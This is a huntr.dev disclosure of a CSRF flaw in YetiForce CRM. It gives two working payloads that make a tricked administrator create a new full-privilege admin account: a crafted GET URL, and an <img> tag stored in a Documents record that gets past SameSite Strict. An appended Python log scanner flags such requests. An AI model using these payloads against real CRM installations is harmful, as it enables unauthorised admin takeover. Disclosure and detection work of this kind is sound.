History: Jan 12, 2022 - 12:01 p.m.

Cross-Site Request Forgery (CSRF) in yetiforcecompany/yetiforcecrm

2022-01-12 12:01:52
supernaruto16
www.huntr.dev
9

EPSS: 0.001 (Low), Percentile: 40.5%

Description

Hi there, I would like to report a CSRF vulnerability in yetiforcecompany/yetiforcecrm.
This allows an attacker to create a new admin.
Even when SameSite: Strict is enabled, this can still be exploited by an attacker with the lowest-privilege account (e.g. guest).

Proof of Concept

  • These are POCs for 2 scenarios; both lead to the creation of a new admin with username testggwp and password Admin@123.

  • Scenario 1: SameSite is None or Lax

  • Trick the admin into accessing the link below

/index.php?module=Users&parent=Settings&view=Edit&fromView=Create&action=Save&picklistDependency=%5b%5d&mappingRelatedField=%5b%5d&listFilterFields=%5b%5d&defaultOtherEventDuration=%5b%7b%22activitytype%22%3a%22Call%22%2c%22duration%22%3a%2260%22%7d%2c%7b%22activitytype%22%3a%22Meeting%22%2c%22duration%22%3a%2260%22%7d%2c%7b%22activitytype%22%3a%22Task%22%2c%22duration%22%3a%2260%22%7d%5d&user_name=testggwp&is_admin=1&first_name=testggwp&last_name=testggwp&roleid=H14&status=Active&user_password=Admin@123&confirm_password=Admin@123&super_user=1&[email protected]&secondary_email=&primary_phone_country=AF&primary_phone=&primary_phone_extra=&phone_crm_extension_country=AF&phone_crm_extension=&phone_crm_extension_extra=&emailoptout=0&date_format=dd-mm-yyyy&hour_format=24&time_zone=Asia%2fBangkok&dayoftheweek=Monday&activity_view=This+Month&defaultactivitytype=Meeting&defaulteventstatus=PLL_PLANNED&view_date_format=PLL_ELAPSED&reminder_interval=15+Minutes&othereventduration=%5b%7b%22activitytype%22%3a%22Call%22%2c%22duration%22%3a60%7d%2c%7b%22activitytype%22%3a%22Meeting%22%2c%22duration%22%3a60%7d%2c%7b%22activitytype%22%3a%22Task%22%2c%22duration%22%3a60%7d%5d&activitytype=Call&duration=60&activitytype=Meeting&duration=60&activitytype=Task&duration=60&currency_id=1&currency_decimal_separator=.&currency_symbol_placement=1.0%24&truncate_trailing_zeros=0&currency_grouping_pattern=123%2c456%2c789&currency_grouping_separator=+&no_of_currency_decimals=2&start_hour=08%3a00&end_hour=16%3a00&language=&rowheight=medium&leftpanelhide=0&default_record_view=Summary&theme=twilight&imagename=%5b%5d&login_method=PLL_PASSWORD&internal_mailer=0&sync_carddav=PLL_OWNER&sync_caldav=PLL_OWNER&sync_carddav_default_country=&default_search_module=&default_search_override=0&default_search_operator=PLL_CONTAINS&available=0&auto_assign=0&records_limit=0&description=&popupReferenceModule=Users&reports_to_id=0&reports_to_id_display=&isPreference=&timeFormatOptions=
  • Scenario 2: SameSite is Strict

  • Create a record in Documents with the payload below in its description (click Source, then paste). After that, trick the admin into visiting the record.

<img src="/index.php?module=Users&parent=Settings&view=Edit&fromView=Create&action=Save&picklistDependency=%5b%5d&mappingRelatedField=%5b%5d&listFilterFields=%5b%5d&defaultOtherEventDuration=%5b%7b%22activitytype%22%3a%22Call%22%2c%22duration%22%3a%2260%22%7d%2c%7b%22activitytype%22%3a%22Meeting%22%2c%22duration%22%3a%2260%22%7d%2c%7b%22activitytype%22%3a%22Task%22%2c%22duration%22%3a%2260%22%7d%5d&user_name=testggwp&is_admin=1&first_name=testggwp&last_name=testggwp&roleid=H14&status=Active&user_password=Admin@123&confirm_password=Admin@123&super_user=1&[email protected]&secondary_email=&primary_phone_country=AF&primary_phone=&primary_phone_extra=&phone_crm_extension_country=AF&phone_crm_extension=&phone_crm_extension_extra=&emailoptout=0&date_format=dd-mm-yyyy&hour_format=24&time_zone=Asia%2fBangkok&dayoftheweek=Monday&activity_view=This+Month&defaultactivitytype=Meeting&defaulteventstatus=PLL_PLANNED&view_date_format=PLL_ELAPSED&reminder_interval=15+Minutes&othereventduration=%5b%7b%22activitytype%22%3a%22Call%22%2c%22duration%22%3a60%7d%2c%7b%22activitytype%22%3a%22Meeting%22%2c%22duration%22%3a60%7d%2c%7b%22activitytype%22%3a%22Task%22%2c%22duration%22%3a60%7d%5d&activitytype=Call&duration=60&activitytype=Meeting&duration=60&activitytype=Task&duration=60&currency_id=1&currency_decimal_separator=.&currency_symbol_placement=1.0%24&truncate_trailing_zeros=0&currency_grouping_pattern=123%2c456%2c789&currency_grouping_separator=+&no_of_currency_decimals=2&start_hour=08%3a00&end_hour=16%3a00&language=&rowheight=medium&leftpanelhide=0&default_record_view=Summary&theme=twilight&imagename=%5b%5d&login_method=PLL_PASSWORD&internal_mailer=0&sync_carddav=PLL_OWNER&sync_caldav=PLL_OWNER&sync_carddav_default_country=&default_search_module=&default_search_override=0&default_search_operator=PLL_CONTAINS&available=0&auto_assign=0&records_limit=0&description=&popupReferenceModule=Users&reports_to_id=0&reports_to_id_display=&isPreference=&timeFormatOptions="> 

Impact

After the CSRF payload is triggered, the attacker can become an admin with full privileges.
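As an added example (not part of this report or of the YetiForce project), the following Python scan runs over constructed web-server access-log lines and flags the request pattern the report relies on: a Users-module Save action reached by GET, carrying is_admin=1 or super_user=1, with a referer outside the Users module (such as a Documents record). The log format, hostnames, IPs and referer URLs are assumptions made for the example.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed access-log lines (combined log format); the first mimics the
# report's PoC request, the others are benign Users-module traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jan/2022:12:01:52 +0700] "GET /index.php?module=Users&parent=Settings&view=Edit&fromView=Create&action=Save&user_name=testggwp&is_admin=1&super_user=1&roleid=H14 HTTP/1.1" 200 512 "https://crm.example.test/index.php?module=Documents&view=Detail&record=42" "Mozilla/5.0"
10.0.0.5 - - [12/Jan/2022:12:02:10 +0700] "GET /index.php?module=Users&parent=Settings&view=List HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Jan/2022:12:03:00 +0700] "POST /index.php?module=Users&parent=Settings&action=Save HTTP/1.1" 302 0 "https://crm.example.test/index.php?module=Users&parent=Settings&view=Edit" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)


def parse_line(line):
    """Parse one combined-format line; return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    url = urlparse(entry["target"])
    # Last value wins for repeated keys (the PoC repeats activitytype/duration).
    entry["params"] = {k: v[-1] for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    return entry


def classify(entry):
    """Return a finding for a Users Save that shows CSRF-style indicators, else None."""
    p = entry["params"]
    if p.get("module") != "Users" or p.get("action") != "Save":
        return None
    reasons = []
    if entry["method"] == "GET":
        reasons.append("state-changing Users Save reached via GET")
    if p.get("is_admin") == "1" or p.get("super_user") == "1":
        reasons.append("request grants admin/super-user privileges")
    ref = entry["referer"]
    if ref and ref != "-" and "module=Users" not in ref:
        reasons.append("referer outside Users module: " + ref)
    if not reasons:
        return None
    return {"ip": entry["ip"], "ts": entry["ts"], "user": p.get("user_name"), "reasons": reasons}


def scan(log_text):
    """Scan a whole log body and collect findings."""
    return [f for f in (classify(e) for e in map(parse_line, log_text.splitlines()) if e) if f]
```

Only the PoC-like line is reported; the legitimate POST from the Users edit form produces no finding, so the scan can be run over real logs with a low false-positive rate for this specific pattern.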

